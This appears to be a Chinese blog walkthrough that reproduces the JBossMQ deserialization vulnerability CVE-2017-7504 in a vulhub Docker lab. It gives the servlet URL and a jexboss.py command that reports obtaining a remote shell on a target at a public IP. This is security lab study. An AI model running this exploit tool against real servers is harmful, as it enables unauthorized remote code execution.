当前位置: 首页 > article >正文

JbossMQ反序列化漏洞CVE-2017-7504

1.环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

2.访问漏洞地址

JBossMQ HTTP-IL Servleticon-default.png?t=O83Ahttp://47.121.211.205:8080/jbossmq-httpil/HTTPServerILServlet

3.运行python文件

python3 jexboss.py -u http://47.121.211.205:8080

成功获取shell


http://www.kler.cn/a/316198.html

相关文章:

  • vivado时序约束和优化
  • 详细全面讲解C++中重载、隐藏、覆盖的区别
  • VSCode Live Server 插件安装和使用
  • 机器学习基础-机器学习的常用学习方法
  • c++类和对象---上
  • 代码随想录 链表 test 5
  • WPF 异步
  • Qt 注册表操作
  • 数据结构--顺序表的创建和增删改查操作
  • windows docker下启动mysql报Bind on unix socket: Input/output error
  • Nginx越界读取缓存漏洞(CVE-2017-7529)
  • 【ShuQiHere】 探索数据挖掘的世界:从概念到应用
  • c++中std::find()函数
  • 【测试】——Selenium API (万字详解)
  • 【dom操作基础】案例题1
  • Ubuntu24.04中安装Electron
  • 8. 防火墙
  • JAVA并发编程系列(8)CountDownLatch核心原理
  • 基于等保2.0标准——区块链安全扩展要求探讨
  • git 介绍+常用命令
  • LeetCode 2374.边积分最高的节点:模拟
  • Git 推送更改到远程仓库
  • 什么是量化交易,纸质股票现在还能交易吗?怎么交易
  • 基于机器学习的注意力缺陷/多动障碍 (ADHD)(python论文+代码)HYPERAKTIV
  • 路径处理 | 关键点提取之Douglas–Peucker算法(附ROS C++/Python实现)
  • 分布式锁的几种方案对比?你了解多少种呢?